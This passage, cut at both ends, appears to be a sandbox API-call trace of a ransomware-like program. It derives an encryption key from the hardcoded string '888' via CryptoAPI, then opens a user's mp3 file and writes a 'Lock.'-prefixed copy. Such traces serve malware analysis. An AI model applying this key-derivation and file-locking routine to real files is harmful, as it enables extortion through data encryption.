lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0208.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0208.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0208.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0208.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0208.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0208.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0208.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0208.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0208.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0208.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0208.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0208.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0208.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0208.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0208.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0208.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0208.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0208.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0208.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0208.044] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0208.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0208.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0208.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0208.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0208.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0208.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0208.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0208.044] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0208.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0208.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0208.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0208.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0208.044] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0208.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0208.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0208.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0208.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0208.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0208.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0208.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0208.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0208.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0208.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0208.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0208.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0208.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0208.045] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0208.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0208.045] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.045] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.045] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0208.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6fe0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0208.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0208.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7120, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0208.046] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7bc48) returned 1 [0208.046] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0208.046] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0208.046] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0208.046] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0208.046] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0208.046] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0208.046] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0208.047] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0208.047] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.047] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.048] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0208.048] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0208.048] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.048] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.048] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0208.048] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0208.048] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0208.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaab88, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0208.048] CryptCreateHash (in: hProv=0xa7bc48, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0208.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0208.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ac8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0208.048] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0208.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0208.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ab8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0208.048] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.048] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.049] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0208.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaab70, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0208.049] CryptHashData (hHash=0x9e1bf8, pbData=0x2a71b98, dwDataLen=0x3, dwFlags=0x1) returned 1 [0208.049] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.049] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.049] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0208.049] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0208.049] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0208.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaae58, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0208.049] CryptDeriveKey (in: hProv=0xa7bc48, Algid=0x6601, hBaseData=0x9e1bf8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1cb8) returned 1 [0208.049] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.049] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.049] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0208.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f71e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0208.049] CryptDestroyHash (hHash=0x9e1bf8) returned 1 [0208.050] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\pGVUGdUF Vft.mp3" (normalized: "c:\\users\\fd1hvy\\music\\pgvugduf vft.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0208.051] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0208.051] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0208.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70a0 [0208.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0208.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0208.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0208.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0208.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0208.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.051] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0208.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0208.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0208.051] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0208.051] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0208.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0208.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0208.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0208.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0208.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0208.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0208.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0208.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0208.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0208.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0208.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0208.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0208.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74f98 [0208.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0208.052] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music/" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0208.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74f98 | out: hHeap=0x2af0000) returned 1 [0208.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0208.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0208.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a138 [0208.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0208.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0208.052] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music/Lock.pGVUGdUF Vft.mp3" (normalized: "c:\\users\\fd1hvy\\music\\lock.pgvugduf vft.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0208.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f60 [0208.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0208.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0208.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0208.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0208.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0208.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0208.053] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0208.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0208.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0208.053] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0208.053] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0208.053] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0208.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0208.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0208.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0208.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0208.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0208.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0208.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0208.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0208.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0208.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0208.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0208.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0208.054] RtlAllocateHeap 